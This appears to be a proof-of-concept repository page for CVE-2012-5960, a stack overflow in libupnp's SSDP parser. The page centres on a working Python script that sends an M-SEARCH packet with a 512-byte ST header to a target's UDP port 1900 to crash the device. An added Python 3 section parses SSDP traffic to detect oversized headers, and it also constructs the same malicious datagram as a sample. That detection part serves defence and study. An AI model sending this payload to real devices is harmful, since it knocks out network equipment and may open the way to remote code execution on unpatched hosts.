
CVE-2012-5960 PoC — UPnP Devices 'unique_service_name' function stack-based buffer overflow vulnerability

Associated Vulnerability
Title: UPnP Devices 'unique_service_name' function stack-based buffer overflow vulnerability (CVE-2012-5960)
Description: Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.
Description
CVE-2012-5960, CVE-2012-5959 Proof of Concept
Readme
# CVE-2012-5960-PoC
CVE-2012-5960, CVE-2012-5959 Proof of Concept

A quick note on something I have been playing with recently.

```python
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Usage: python2 libupnp_DoS_PoC.py

import socket

TARGET = 'TARGET_IP'

'''
normal_traffic = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:upnp:rootdevice\r\n'                    \
    '\r\n'
'''

dos = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:uuid:schemas:device:{}:anything\r\n'    \
    '\r\n'.format("A"*512)

# Set up UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(1)
s.sendto(dos, (TARGET, 1900))

try:
    while True:
        data, addr = s.recvfrom(65507)  # Maximum UDP data length
        print "------------------------\nFailed DoS...\n------------------------\n"
        print "Response:"
        print addr, data
        exit(1)
except socket.timeout:
    print "------------------------\nSuccessful DoS!!!\n------------------------\n"
    exit(0)
```
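The PoC above works by sending an M-SEARCH whose ST header carries a UDN far longer than the vulnerable parser expects. As an added example (not part of the PoC repository and not libupnp code), the following Python 3 snippet shows the defender's side: it parses SSDP/HTTPU datagrams the way a passive monitor on UDP/1900 might and flags header values whose length is out of the ordinary. The 128-byte threshold and the two constructed sample datagrams are assumptions for illustration; the real internal buffer sizes of libupnp are not taken from this page.

```python
#!/usr/bin/env python3
# Added example: heuristic detection of oversized SSDP header values.
# Not part of the CVE-2012-5960 PoC repository or of libupnp.

import re

# Assumed threshold for illustration only. Legitimate ST/USN/NT values
# (e.g. "upnp:rootdevice", "uuid:<36 chars>::urn:schemas-upnp-org:device:...")
# stay well under this; libupnp's actual buffer sizes are not asserted here.
MAX_HEADER_VALUE = 128

# HTTP-style header line: token, optional spaces, colon, optional spaces, value.
HEADER_RE = re.compile(r'^([A-Za-z0-9\-]+)\s*:\s*(.*)$')

# Headers that the SSDP parser turns into a UDN / service name.
WATCHED_HEADERS = ('ST', 'USN', 'NT')


def parse_ssdp(payload):
    """Split an SSDP datagram into (request_line, {HEADER: value}).

    Header names are upper-cased because SSDP treats them case-insensitively.
    Malformed lines are skipped rather than raising, since a monitor must not
    crash on garbage input.
    """
    text = payload.decode('latin-1')          # byte-preserving decode
    head, _, _body = text.partition('\r\n\r\n')
    lines = head.split('\r\n')
    request_line = lines[0] if lines else ''
    headers = {}
    for line in lines[1:]:
        match = HEADER_RE.match(line)
        if match:
            headers[match.group(1).upper()] = match.group(2)
    return request_line, headers


def suspicious_fields(payload, limit=MAX_HEADER_VALUE):
    """Return [(header, length), ...] for watched headers longer than limit."""
    _request_line, headers = parse_ssdp(payload)
    findings = []
    for name in WATCHED_HEADERS:
        value = headers.get(name)
        if value is not None and len(value) > limit:
            findings.append((name, len(value)))
    return findings


def build_msearch(st_value):
    """Construct a sample M-SEARCH datagram (constructed test input)."""
    return ('M-SEARCH * HTTP/1.1\r\n'
            'HOST:239.255.255.250:1900\r\n'
            'MX:3\r\n'
            'MAN:"ssdp:discover"\r\n'
            'ST:%s\r\n'
            '\r\n' % st_value).encode('latin-1')


# Constructed samples: the ordinary discovery probe from the README's
# commented-out "normal_traffic", and one shaped like the PoC's ST header.
NORMAL = build_msearch('upnp:rootdevice')
OVERSIZED = build_msearch('uuid:schemas:device:%s:anything' % ('A' * 512))


if __name__ == '__main__':
    for label, datagram in (('normal', NORMAL), ('oversized', OVERSIZED)):
        print(label, suspicious_fields(datagram))
```

Run against a pcap or a live UDP/1900 socket, the same `suspicious_fields()` check gives an alert that is independent of the exact overflow branch hit; patching to libupnp 1.6.18 or later remains the actual fix.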
Tested on libupnp 1.6.13:

![libupnp_1.6.13_CVEmarked](https://imgur.com/IhyUdp8.png)

Demo video:

[![](http://img.youtube.com/vi/3W3NO3nnKJM/0.jpg)](http://www.youtube.com/watch?v=3W3NO3nnKJM "")
File Snapshot

[4.0K] /data/pocs/39d473db7751cd111278a91909b89aee07a5c480
├── [1.2K] libupnp_DoS_PoC.py
├── [1.5K] README.md
└── [ 35K] ssdp_server(libupnp_1.6.13).c

0 directories, 3 files